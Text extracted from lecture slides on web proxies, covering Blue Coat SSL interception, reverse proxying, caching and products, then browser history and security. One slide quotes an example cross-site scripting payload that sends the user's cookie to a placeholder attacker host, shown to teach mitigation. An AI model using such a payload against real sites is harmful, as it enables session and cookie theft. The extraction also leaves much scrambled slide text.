The dynamics of internet and new security risks urged for
a new way of categorizing the Internet, Dynamic rating of
uncategorized websites can today rate most websites, the
15 Million
ones thats impossible to rate could be stripped down to
present only html and images to reduce risk.
335 Million
332
Servers
Internet
RS
language 1
G2
To background rating
Language detection
language 2
language 3
language 4
44µs language 5
language n
DBR
HR
DRTR
Clients
SSL Proxy
334
Apps
SSL Policy SSL
User
Internet Internal
Network
335
Blue Coat: Visibility and Context
Client-Proxy Connection Server-Proxy Connection
Client Proxy Server
Flexible Configurations
• Trusted applications passed through
– Sensitive, known, financial or health
care Option 1
• No cache, visibility
• Awareness of network-level
Apps
information only Control
User
SSL
Internet
TCP TCP
337
Flexible Configurations
• Initial checks performed
– Valid user, valid application
– Valid server cert
• User/application traffic passed through
after initial checks Option 2
• No cache
• Visibility and context of network-level info, certificates,
user, and applications
• Can warn user, remind of AUP, and
offer opt-out
Control
Apps
User
SSL
Internet
TCP TCP
338
Flexible Configurations
• Initial checks performed
– Valid user, valid application
– Valid server cert
• User/application traffic proxied after initial checks
• Full caching and logging options Option 3
• Visibility and context of network-level info,
certificates, user, applications, content, etc.
– Full termination/proxy
• Can warn user, remind of AUP, and
offer opt-out
Control
Apps
User
SSL SSL
Internet TCP TCP
339
Reverse Proxy
340
Reverse Proxy
Policy
Logging
Authentication URL-rewrite
Internet
Clients
Servers
AV SSL/Certificate
Caching
341
Reverse Proxy
PROTECTS Web Servers ACCELERATES Web Content
• Secure, object-based OS • Intelligent caching
• Controls access to web apps • Compression and bandwidth mgt.
• Web AV scanning • TCP & SSL offload
Web
Servers
ProxySG
Users
Firewall
Internal Public
Network Internet
Users
SIMPLIFIES Operations
• Scalable, optimized appliance
• Easy policy creation & management
• Complete logging & reporting
HTTPS Termination
• HTTPS Termination (Client ProxySG)
– Off-load secure website or portal
• HTTPS Origination (ProxySG Server)
– Secure channel to content server for clients
• Man-in-the-Middle (Termination & Origination)
– Allows caching, policy and virus scanning
• Secure credential acquisitions
• SSL Hardware Acceleration Cards
– 800 RSA transactions per second per card
– SSL v2.0, v3.0, and TLS v1 support
• Off-load web application servers to improve performance
343
Example Scenarios for Reverse Proxy
• Secure and Accelerate Public Websites
– Improves content delivery with integrated caching
– Services legitimate users while resisting DoS attacks
– High-performance SSL
• Secure Corporate Webmail
– Securely isolates Web servers from direct Internet access
– Proxy authentication for additional layer of protection
– Plug-n-play SSL
• Scanning Uploaded Files for Viruses
– Simple integration with ProxyAV™
– Real-time scanning of uploaded content
– Protects Web infrastructure from malware
344
Recipe for Branch
Performance Problems
Server Consolidation
+ Increased application traffic
• Enterprise users
becoming more distributed
– Mobile, teleworker, and branch/
remote offices
– Regulatory and cost drivers
• Remote employee training
becoming a necessity
– Live (streaming) and on-demand video
• Performance quality
becoming a requirement
– Network and application issues must be
addressed
– Control and acceleration of video
is needed
349
Bandwidth Management
Sales Automation App E-Mail
Priority 1 Priority 2
Min 400Kb, Max 800Kb Min 100Kb, Max 400Kb
Protocol Optimization
351
Protocol Optimization
10-100X Faster
Includes CIFS, MAPI, HTTP, HTTPS, TCP
352
Object Caching
• Built on high-level applications and protocols
– HTTP/Web caching
– Streaming caches
– CIFS cache
• Advantages
– Fastest response times
– Offload work from servers (and networks)
– Can be deployed asymmetrically
• Limitations
– Application-specific
– All or nothing: No benefit if whole object not found or changed
353
Byte Caching
Local History Cache Remote History Cache
…..11011111001110011...11100111100110 …..11011111001110011...11100111100110
01010111011001000011010011001110010 Sequences are 01010111011001000011010011001110010
They are
00001111000111001100011000001001111 The original 00001111000111001100011000001001111
found in the local
00000011011110100100001101100010111 Proxies keep a 00000011011110100100001101100010111
transmitted as
11001010101011100110100111010011110 history of all
stream
history is
cache 11001010101011100110100111010011110
small references
01000000000000111001011100101101101 reconstructed01000000000000111001011100101101101
10100101011001011001111000111111111 bytes sent and 10100101011001011001111000111111111
1000000000
over the WAN using the remote
received history cache
1000000000
1101111100111001001001011100110
1101111100111001001001011100110 0101011101100100001101001100111
0101011101100100001101001100111 0010000011110001110011000110000
0010000011110001110011000110000 [R1]0010010[R2]100101111100 0100111100000011011110100100001
0100111100000011011110100100001 110100111011010011[R3] 1011010010111110011010011101101
1011010010111110011010011101101 0011010011110010000000000001110
0011010011110010000000000001110 0101110010110110110100101011001
0101110010110110110100101011001 01100
01100
Compression
110111110011100100100 110111110011100100100
101110011001010111011 101110011001010111011
001000011010011001110 001000011010011001110
010000011110001110011 010000011110001110011
000110000010011110000 COMPRESSION 000110000010011110000
001101111010010000110 1101111100111001001001011100110010101110110010000 001101111010010000110
110100101111100110100 10011001110010000011110001110011000110000010011 110100101111100110100
111011010011010011110 111011010011010011110
010000000000001110010 010000000000001110010
111001011011011010010 111001011011011010010
101100101100010100100 101100101100010100100
101010101010100010111 101010101010100010111
Object Caching
• Object caches are built on higher level applications and protocols
– HTTP/Web caching
– Streaming caches
– CIFS cache
• Object cache advantages
– Fastest response times
– Offload work from servers
– Can be deployed asymmetrically
• Object cache disadvantages
– Works with limited set of applications
– Works on limited range of data inside applications
– All or nothing: No benefit if whole object not found or changed
357
Object vs. Byte Caching
Server Offload X
Network Offload X X
Incremental Updates X
No App Integration X
Products
359
MACH Ships with Blue Coat SGOS 5
5
SG8000 Series
Headquarters
Corporate
SG800 Series
SG400 Series
Corporate
Headquarters
2000-E Series
400-E Series
Remote
Offices
Connected
Users Up to 250 users 100-2000 users 1000 -50,000+ users
Performance
361
400-E1
• One Model: 400-E1
• RAM: 512 MB
• CPU: 1.26GHz PIII
• Disk drive 40 GB IDE
• Network Interfaces (2 on board) 10/100
Base-T Ethernet
• 19" Rack-mountable
362
Software
Reporter (SW)
Advanced Java application to generate statistics from logs
363
Licenced products
Licensed products
Streaming
Real Networks, Microsoft, Quicktime
Instant Messaging
MSN, Yahoo, AOL
Optional Security (HW+SW bundle)
SSL termination/proxy
364
Licenced products
Licensed products
Content filtering
BlueCoat Webfilter
ICAP AV Scanner
ProxyAV (McAfee, Sophos, Panda, Kaspersky, Ahn Labs)
365
Management
367
Management
• User Interface
– HTTP (HTTPS), web GUI Interface
– Telnet (Cisco CLI)
– SSH & Serial console
– Java Policy interface
– CPL, Policy Language
– SNMP MIBII + Traps
– Monitor network status and statistics
• Reporting tools
– BlueCoat Reporter
• Scalable management
– Centralized configuration management in Director
368
Reporting (example)
Production systems
375
Content Delivery Network
1 Publish
content WWW Pull content
4
Servers from origin
servers.
Content
Owners
Edge
Systems
Director
2 Tell Director
about new 5 Deliver the
content
3 Tell caches to content.
update content
Users
376
GUI
377
History
• First ever browser – WorldWideWeb
(1990)
o Created at CERN by Tim Berners-Lee
o Used internally, no real security threats
o Would only display HTML text
o Allowed downloading of other file types
378
History
• Mosaic (1993)
o First browser with a GUI
o Lead to increase in Internet popularity
• Netscape Navigator (1994)
o Nearly disappeared by 2000
• Internet Explorer (1995)
o Held as much as 95% of the market
379
History
• Safari (2003)
o Apple’s browser
• Firefox (2004)
o Open source
• Chrome (2008)
o Rapid increase in market share
380
Security Issues
Security Issues
Cross Site Scripting (XSS)
o Takes advantage of complex, dynamic web pages
o Injects client side scripts, HTML
o Can lead to cookie theft, browser redirection, untrusted content
o Nearly 80% of vulnerabilities in 2007 (Symantec)
382
Security Issues
Example
http://portal.example/index.php?sessionid=12312312&
username=<script>document.location='http://attackerhost.example/cgi-bin/
cookiesteal.cgi?'+document.cookie</script>
source: http://projects.webappsec.org/w/page/13246920/Cross-Site-Scripting
• XSS Mitigation
Disable scripting
Sanitize input, escape HTML/scripts
No script access to cookies
383
Security Issues
• Local Storage
o Form data
o Login credentials
• Browser Guards
o Modern browsers will prevent users from visiting malicious sites
o Two main methods
List of reported malicious sites
Algorithm to detect malicious code on a site
o This can protect from viruses, phishing, and other threats
385
What is Internet
At any time millions user connected to the internet from many countries.
386
Uses of Internet
Searching
E-mail service
Commercial Services
Electronic books & Publication
Video Conferencing
Sharing data and results quickly
Retrieving files & Program of all types
Find information databases and tutorials
News paper columns
Banking
Downloading / Uploading any information
News, sports, stocks, music etc.
Use of internet in various fields like education, Business, governance, etc.
And many more ………………..
387
Useful Keys Internet
• Network: Connecting computers with each other For exchanging
information
(Search engine)
19/08/2021 389
388
• Exercises
391
Thank you